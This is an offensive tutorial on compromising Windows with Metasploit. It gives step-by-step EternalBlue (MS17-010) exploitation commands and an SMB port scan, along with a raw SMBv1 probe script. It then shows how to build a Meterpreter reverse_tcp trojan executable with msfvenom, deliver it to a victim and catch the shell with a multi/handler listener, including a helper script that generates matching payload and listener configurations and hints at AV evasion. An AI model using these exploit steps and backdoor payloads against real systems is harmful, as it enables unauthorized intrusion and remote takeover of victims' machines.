H4ck Windows using METASPLOIT
DO NOT HACK ANYONE UNTIL YOU HAVE PERMISSION
I assume you have a decent Linux distro for hacking,
or at least Metasploit installed.
- The target must accept inbound connections on TCP port 445 (its firewall is off, or has a rule that allows SMB)
- Attacker and victim must be able to reach each other over the network [at the very least the attacker must know the victim's IP address]
EternalBlue (MS17-010) is a critical vulnerability in the SMBv1 server of unpatched Windows machines, classically Windows 7 / Server 2008 R2 and older. It is reached over SMB on TCP port 445.
Scan the target and check whether its SMB port is open or not:
```python
import socket

target_ip = "target ip"  # specify your target's IP
target_port = 445

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)  # a filtered port would otherwise hang the connect for minutes
try:
    sock.connect((target_ip, target_port))
    print("[+] PORT 445 IS OPEN, YOU CAN ATTACK !!")
except (socket.timeout, OSError):
    print("[-] TARGET IS SAFE, TRY ANOTHER WAY TO ATTACK :(")
finally:
    sock.close()
```
If the target's port is open we can hack. An open port 445 only tells you that SMB is listening, not that the host is vulnerable: before firing the exploit, confirm it with auxiliary/scanner/smb/smb_ms17_010 (set RHOSTS and run), because EternalBlue does not work against a patched host and a failed attempt can blue-screen a vulnerable one.
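The port check above only proves that something is listening. As an added example (my code, not from the original page), the script below goes one step further and sends a raw SMB1 NEGOTIATE offering only the "NT LM 0.12" dialect, then reports whether the host still speaks SMBv1 at all, which is a hard prerequisite for EternalBlue. It is not a vulnerability check (that is what auxiliary/scanner/smb/smb_ms17_010 is for). The function names, the constructed sample reply and the placeholder address 192.0.2.10 are all my assumptions.

```python
import socket
import struct

# Added example, not from the original page: ask the server, with a raw SMB1
# negotiate, whether it still accepts an SMBv1 dialect. EternalBlue needs SMBv1;
# a host that only answers SMB2/3 is not a target for ms17_010_eternalblue
# whatever its patch level. This is NOT a check for the MS17-010 bug itself.

SMB1_MAGIC = b"\xffSMB"
SMB2_MAGIC = b"\xfeSMB"
SMB_COM_NEGOTIATE = 0x72
# SMB1 header (32 bytes, little-endian): magic, command, NT status, flags,
# flags2, pid_high, security_features, reserved, tid, pid_low, uid, mid
SMB1_HEADER = "<4sBIBHH8sHHHHH"


def netbios_frame(smb: bytes) -> bytes:
    """Prefix an SMB message with the 4-byte NetBIOS session service header."""
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


def build_smb1_negotiate(dialects=(b"NT LM 0.12",)) -> bytes:
    """SMB_COM_NEGOTIATE that offers only SMB1 dialects (NT LM 0.12 is what Win7 speaks)."""
    header = struct.pack(SMB1_HEADER, SMB1_MAGIC, SMB_COM_NEGOTIATE, 0,
                         0x18,    # flags: canonical paths, case-insensitive
                         0xC801,  # flags2: unicode, NT status, ext. security, long names
                         0, b"\x00" * 8, 0, 0, 0xFEFF, 0, 1)
    data = b"".join(b"\x02" + d + b"\x00" for d in dialects)  # dialect buffer entries
    body = struct.pack("<BH", 0, len(data)) + data              # WordCount=0, ByteCount
    return netbios_frame(header + body)


def parse_negotiate_response(packet: bytes) -> str:
    """Classify a NetBIOS-framed reply: smb1 / no-dialect / smb2-only / error:0x.. / not-smb / short."""
    if len(packet) < 4 + 32 + 1:
        return "short"
    smb = packet[4:]  # strip the NetBIOS header
    if smb[:4] == SMB2_MAGIC:
        return "smb2-only"  # server answered with SMB2, SMBv1 is not on offer
    if smb[:4] != SMB1_MAGIC:
        return "not-smb"
    _, cmd, status = struct.unpack_from("<4sBI", smb, 0)
    if cmd != SMB_COM_NEGOTIATE:
        return "not-smb"
    if status != 0:
        return "error:0x%08x" % status
    word_count = smb[32]
    if word_count == 0 or len(smb) < 35:
        return "no-dialect"
    dialect_index = struct.unpack_from("<H", smb, 33)[0]  # 0xFFFF = none of ours accepted
    return "no-dialect" if dialect_index == 0xFFFF else "smb1"


def _recv_exact(sock, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf


def probe_smb1(host: str, port: int = 445, timeout: float = 3.0) -> str:
    """Connect, send the negotiate and return the classification ('closed'/'timeout' on failure)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(build_smb1_negotiate())
            nb = _recv_exact(sock, 4)
            length = int.from_bytes(nb[1:4], "big") & 0x1FFFF  # 17-bit NetBIOS length
            return parse_negotiate_response(nb + _recv_exact(sock, length))
    except socket.timeout:
        return "timeout"
    except OSError:  # refused, reset, or closed without a reply
        return "closed"


def make_sample_reply(status: int = 0, dialect_index: int = 0) -> bytes:
    """Constructed SMB1 negotiate reply (not a capture) so the parser can be exercised offline."""
    header = struct.pack(SMB1_HEADER, SMB1_MAGIC, SMB_COM_NEGOTIATE, status,
                         0x98, 0xC801, 0, b"\x00" * 8, 0, 0, 0xFEFF, 0, 1)
    params = struct.pack("<BH", 17, dialect_index) + b"\x00" * 32  # WordCount=17, DialectIndex, rest zeroed
    return netbios_frame(header + params + struct.pack("<H", 0))   # ByteCount=0


if __name__ == "__main__":
    import sys
    host = sys.argv[1] if len(sys.argv) > 1 else "192.0.2.10"  # placeholder address
    print(host, "->", probe_smb1(host))
```

Run it as `python3 smb1_probe.py <target-ip>`. An answer of "smb2-only", "no-dialect" or "closed" means EternalBlue is off the table for that host; "smb1" means SMBv1 is enabled and it is worth running the smb_ms17_010 scanner next.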
Open Metasploit:
```shell
sudo msfconsole
```
Once Metasploit has started, load the EternalBlue module with use exploit/windows/smb/ms17_010_eternalblue:
```
msf6 > use exploit/windows/smb/ms17_010_eternalblue
```
This is a prebuilt Metasploit module; you can see its options by typing show options:
```
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
```
You will see a lot of options, but we are interested only in RHOSTS, LHOST and LPORT. Metasploit is kind enough to auto-configure LHOST (the address of your primary interface) and LPORT (4444 by default); you can change them whenever you need:
```
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set LPORT <ANY_PORT>
```
Simply run the exploit by typing run or exploit:
```
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
```
If you did everything right you should get a Meterpreter shell back. If the module reports the target as not vulnerable or the session never arrives, re-check with the smb_ms17_010 scanner instead of retrying blindly: repeated attempts can crash the target.
CONGRATULATIONS, YOU JUST H4CKED INTO A SYSTEM
A payload is the code that runs on the target once an exploit succeeds or once a victim executes a file you delivered. A Meterpreter reverse_tcp payload, for example, connects back to your listener and gives you an interactive session on the machine.
We're going to make one.
There are several payload-generating tools. We are using msfvenom because it comes preinstalled with the Metasploit framework; feel free to use other tools, you just need to read their manuals.
In a payload-based attack we can't get into the system without any contact with it: we need a way to deliver the payload to the victim and have it executed. The good news is that the same payload runs on any Windows machine of the matching architecture. The catch is that an unencoded msfvenom executable is a well-known signature, so Windows Defender and most AV products will quarantine it on sight; on a real engagement expect to need encoding, encryption or a custom loader.
Let's rock and roll.
Generate the payload (-f exe is required: -o alone only names the file, it does not pick the output format):
```shell
msfvenom -p [payload_type] -a [victim_architecture] --platform windows LHOST=[YOUR_IP] LPORT=[ANY_OF_YOUR_PORTS] -f exe -o payload.exe
```
You need to replace the [..] parts.
...
There are many payload types in msfvenom.
I usually recommend and use:
- windows/x64/meterpreter/reverse_tcp for 64-bit devices
- windows/meterpreter/reverse_tcp for 32-bit devices
You need to specify the victim's architecture after -a:
- x64 for 64-bit devices
- x86 for 32-bit devices
...
We have successfully created a payload [the kind of file AV vendors flag as a backdoor or trojan].
Now we need to start a listener in Metasploit.
Fire up Metasploit:
```shell
sudo msfconsole
```
Load the generic handler with use exploit/multi/handler:
```
msf6 > use exploit/multi/handler
```
Set the options. PAYLOAD must be exactly the payload you gave msfvenom (a handler configured for a different payload will not complete the staging when the victim connects back), and LHOST/LPORT must be the values baked into the payload:
```
set PAYLOAD <PAYLOAD-USED-IN-MSFVENOM>
set LHOST <IP-SET-IN-PAYLOAD>
set LPORT <PORT-SET-IN-PAYLOAD>
```
Enter run.
This will start the listener.
Wait for the victim to execute the payload; you should get a Meterpreter shell back.
Congratulations, you have hacked into another system.
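The most common reason the handler never gets a session is a mismatch between what was baked into payload.exe and what the handler is set to. As an added example (my code, not from the original page), the helper below derives both the msfvenom command line and a multi/handler resource script from one parameter set, and refuses a payload whose architecture disagrees with -a, an LHOST that is not an IP address, or an out-of-range LPORT. The function names, the handler.rc file name and the address 192.0.2.10 (RFC 5737 documentation range) are my assumptions.

```python
import ipaddress
import shlex

# Added example, not from the original page: generate the msfvenom command and
# the matching exploit/multi/handler resource script from ONE parameter set so
# PAYLOAD/LHOST/LPORT cannot drift between payload and listener.

# The page's recommended Meterpreter stagers, keyed by victim architecture.
PAYLOADS = {
    "x64": "windows/x64/meterpreter/reverse_tcp",
    "x86": "windows/meterpreter/reverse_tcp",
}


def payload_arch(payload: str) -> str:
    """msfvenom's Windows payload names carry the architecture in the path."""
    return "x64" if "/x64/" in payload else "x86"


def validate(payload: str, arch: str, lhost: str, lport: int) -> None:
    """Catch the mistakes that silently produce a handler that never gets a session."""
    if payload not in PAYLOADS.values():
        raise ValueError("unknown payload %r; use one of %s" % (payload, sorted(PAYLOADS.values())))
    if arch not in PAYLOADS:
        raise ValueError("arch must be x64 or x86, not %r" % arch)
    if payload_arch(payload) != arch:
        raise ValueError("payload %s is %s but -a %s was given" % (payload, payload_arch(payload), arch))
    ipaddress.ip_address(lhost)  # raises ValueError on placeholders such as "YOUR_IP"
    if not 1 <= lport <= 65535:
        raise ValueError("LPORT out of range: %d" % lport)


def msfvenom_cmd(payload, arch, lhost, lport, outfile="payload.exe"):
    """argv for msfvenom; -f exe is required, -o alone does not select the format."""
    validate(payload, arch, lhost, lport)
    return ["msfvenom", "-p", payload, "-a", arch, "--platform", "windows",
            "LHOST=%s" % lhost, "LPORT=%d" % lport, "-f", "exe", "-o", outfile]


def handler_rc(payload, arch, lhost, lport):
    """Resource script for `msfconsole -q -r handler.rc`; PAYLOAD matches msfvenom's -p."""
    validate(payload, arch, lhost, lport)
    return "\n".join([
        "use exploit/multi/handler",
        "set PAYLOAD %s" % payload,
        "set LHOST %s" % lhost,
        "set LPORT %d" % lport,
        "set ExitOnSession false",  # keep listening after the first session arrives
        "exploit -j",               # run the handler as a background job
        "",
    ])


if __name__ == "__main__":
    params = ("windows/x64/meterpreter/reverse_tcp", "x64", "192.0.2.10", 4444)  # placeholder address
    print(shlex.join(msfvenom_cmd(*params)))
    with open("handler.rc", "w") as fh:
        fh.write(handler_rc(*params))
    print("wrote handler.rc; start the listener with: sudo msfconsole -q -r handler.rc")
```

Run the script once, paste the printed msfvenom line into your shell to build payload.exe, then start the listener with `sudo msfconsole -q -r handler.rc`; because both artifacts come from the same parameters, the handler is guaranteed to expect the payload that was actually built.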